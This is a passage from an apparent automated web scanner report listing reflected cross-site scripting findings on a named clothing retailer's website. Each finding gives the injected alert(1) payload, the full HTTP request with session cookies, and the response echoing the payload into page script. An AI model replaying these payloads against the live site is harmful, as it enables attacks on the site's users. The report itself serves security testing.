Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men32758"-alert(1)-"88339fcc816/trousers/");
//]]>
...[SNIP]...

1.227. http://www.fredperry.com/men/trousers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/trousers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 641ae"-alert(1)-"0f8046e452d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/trousers641ae"-alert(1)-"0f8046e452d/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tm365jrdhtskqa9asf90no4sp0; expires=Tue, 09-Nov-2010 17:02:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/trousers641ae"-alert(1)-"0f8046e452d/");
//]]>
...[SNIP]...

1.228. http://www.fredperry.com/men/trousers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/trousers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c177f"-alert(1)-"7e003bc6dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/trousers/?c177f"-alert(1)-"7e003bc6dd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9igs671tvn9lchq7565js7dvv2; expires=Tue, 09-Nov-2010 17:00:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's T
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/trousers/?c177f"-alert(1)-"7e003bc6dd=1");
//]]>
...[SNIP]...

1.229. http://www.fredperry.com/men/woven-shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/woven-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70388"-alert(1)-"5b48da15cf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men70388"-alert(1)-"5b48da15cf0/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=be02l2afv72o2hgpi89r2t6k21; expires=Tue, 09-Nov-2010 17:02:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men70388"-alert(1)-"5b48da15cf0/woven-shirts/");
//]]>
...[SNIP]...

1.230. http://www.fredperry.com/men/woven-shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/woven-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57173"-alert(1)-"36554d3b526 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/woven-shirts57173"-alert(1)-"36554d3b526/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ielk38p1cdvnm9vrm5hl46edf1; expires=Tue, 09-Nov-2010 17:02:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/woven-shirts57173"-alert(1)-"36554d3b526/");
//]]>
...[SNIP]...

1.231. http://www.fredperry.com/men/woven-shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/woven-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8afd8"-alert(1)-"8bd75d8fddd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/woven-shirts/?8afd8"-alert(1)-"8bd75d8fddd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s1fpmi78oovkincf8akrcqp2i1; expires=Tue, 09-Nov-2010 17:00:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Woven S
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/woven-shirts/?8afd8"-alert(1)-"8bd75d8fddd=1");
//]]>
...[SNIP]...

1.232. http://www.fredperry.com/productinfo/clothingsizes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/clothingsizes/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c55"-alert(1)-"c7ef5670682 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfoa6c55"-alert(1)-"c7ef5670682/clothingsizes/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4dk5d5fdmk3eqt52kduntndmk1; expires=Tue, 09-Nov-2010 17:24:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfoa6c55"-alert(1)-"c7ef5670682/clothingsizes/");
//]]>
...[SNIP]...

1.233. http://www.fredperry.com/productinfo/clothingsizes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/clothingsizes/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5c47"-alert(1)-"0dd4d3a7fb3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/clothingsizesd5c47"-alert(1)-"0dd4d3a7fb3/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9bdq06ni08c4g2tn7li98can80; expires=Tue, 09-Nov-2010 17:24:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/clothingsizesd5c47"-alert(1)-"0dd4d3a7fb3/");
//]]>
...[SNIP]...

1.234. http://www.fredperry.com/productinfo/clothingsizes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/clothingsizes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 935de"-alert(1)-"65c96b3a2a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/clothingsizes/?935de"-alert(1)-"65c96b3a2a8=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:23:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uv4c754ce5o9idhmmcc9egapj7; expires=Tue, 09-Nov-2010 17:23:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Clothin
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/clothingsizes/?935de"-alert(1)-"65c96b3a2a8=1");
//]]>
...[SNIP]...

1.235. http://www.fredperry.com/productinfo/footwearsizes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/footwearsizes/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8766a"-alert(1)-"5e40dafcba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo8766a"-alert(1)-"5e40dafcba/footwearsizes/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=g1a2987226st1p04jpl19bp5o7; expires=Tue, 09-Nov-2010 17:20:29 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo8766a"-alert(1)-"5e40dafcba/footwearsizes/");
//]]>
...[SNIP]...

1.236. http://www.fredperry.com/productinfo/footwearsizes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/footwearsizes/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e65d7"-alert(1)-"854115540de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/footwearsizese65d7"-alert(1)-"854115540de/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lb7d9b5603smg4kjol3qn871u6; expires=Tue, 09-Nov-2010 17:20:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/footwearsizese65d7"-alert(1)-"854115540de/");
//]]>
...[SNIP]...

1.237. http://www.fredperry.com/productinfo/footwearsizes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/footwearsizes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb3f0"-alert(1)-"7841aac267f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/footwearsizes/?cb3f0"-alert(1)-"7841aac267f=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jvt7334pjhmribj6rldhpgtti0; expires=Tue, 09-Nov-2010 17:19:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Footwea
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/footwearsizes/?cb3f0"-alert(1)-"7841aac267f=1");
//]]>
...[SNIP]...

1.238. http://www.fredperry.com/productinfo/garmentcare/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/garmentcare/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41bd1"-alert(1)-"d86befb387e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo41bd1"-alert(1)-"d86befb387e/garmentcare/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sl5ve9h94p1gn2rpouag2sh9s7; expires=Tue, 09-Nov-2010 17:19:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo41bd1"-alert(1)-"d86befb387e/garmentcare/");
//]]>
...[SNIP]...

1.239. http://www.fredperry.com/productinfo/garmentcare/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/garmentcare/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46cd0"-alert(1)-"28805937ef9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/garmentcare46cd0"-alert(1)-"28805937ef9/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3ccgtno5td8a3ftph0l9no5fr4; expires=Tue, 09-Nov-2010 17:20:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/garmentcare46cd0"-alert(1)-"28805937ef9/");
//]]>
...[SNIP]...

1.240. http://www.fredperry.com/productinfo/garmentcare/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/garmentcare/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a3c9"-alert(1)-"a1e63e7882e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/garmentcare/?9a3c9"-alert(1)-"a1e63e7882e=1 HTTP/1.1
Host: www.fredperry.com
